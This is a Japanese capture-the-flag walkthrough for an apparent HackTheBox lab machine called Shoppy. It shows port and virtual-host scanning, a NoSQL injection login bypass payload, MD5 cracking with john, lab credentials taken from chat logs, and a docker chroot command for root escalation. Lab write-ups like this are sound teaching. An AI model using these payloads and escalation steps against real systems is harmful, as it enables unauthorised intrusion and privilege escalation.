以下のテキストを「日本語」に翻訳してください:
ip:10.10.11.180
情報収集#
ポートのオープン状況#
nmapを使用してポートスキャンを実行します。
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.180
見つかったポート:22,80,9093
80 番ポートはhttp://shoppy.htb にリダイレクトされます。
hosts ファイルに解決を追加します。
http://shoppy.htb/ にアクセスすると、以下のようなホームページが表示されます。
ドメインの状況#
ドメインがあるので、バーチャルホストスキャンで何かを見つけることができるか確認してみましょう。
gobuster vhost -u shoppy.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50
1 つのバーチャルホストサブドメインが見つかりました。
mattermost.shoppy.htbを hosts ファイルに追加して解決します。
ブラウザでアクセスすると、以下のような画面が表示されます。
ffufを使用して shoppy.htb の感度の高いディレクトリとファイルを検索します。
.\ffuf.exe -w .\fuzz1.txt -u http://shoppy.htb/FUZZ
簡単にテストした結果、このログインボックスには POST リンクがありません。
admin' or '1'='1 と入力するとプログラムは応答しなくなり、admin' || '1=1 と入力するとバックエンドのログインをバイパスできます。このステートメントは NoSQL のステートメントであり、これは [[NoSQL インジェクション]] ログインバイパスです。
検索ボックスに同じペイロードを入力します:admin' || '1=1
JSON ファイルを確認すると、アカウントとパスワードが含まれており、パスワードは MD5 でハッシュ化されています。
[[john]] を使用してハッシュをクラックします。
john --wordlist=rockyou.txt --format=Raw-MD5 passwd.txt
remembermethisway
クラックされたパスワードを使用して mattermost.shoppy.htb にログインします。
アカウントとパスワードは次のとおりです:
josh:remembermethisway
mattermost.shoppy.htb ウェブサイトはチャットプログラムであり、バックエンドには多くのチャンネルがあります。1 つのチャンネルでアカウントとパスワードを見つけましたが、分析によると、これは 10.10.11.180 サーバーのパスワードです。SSH ログインを試してみましょう。
ユーザー名:jaeger
パスワード:Sh0ppyBest@pp!
最初のフラグ、user.txt を見つけました。
sudo -l を使用して、現在のユーザーが root として実行できるプログラムを確認できます。
/home/deploy/password-manager
Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
SampleAccess granted! とあるので、Sample がマスターパスワードです。このプログラムを使用すると、マスターパスワードを表示できます。
deploy のパスワードを見つけました。
ユーザー名:deploy
パスワード:Deploying@pp!
同じ方法で、deploy アカウントに SSH ログインします。
権限の昇格#
チャンネルのチャット履歴からわかるように、サーバーは Docker でデプロイされています。
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
実行後、ルート権限が得られます。
/root ディレクトリのフラグを取得します。
スキル#
- 情報収集の能力
- バーチャルホスト、MD5 パスワードクラックの能力
- 権限昇格の能力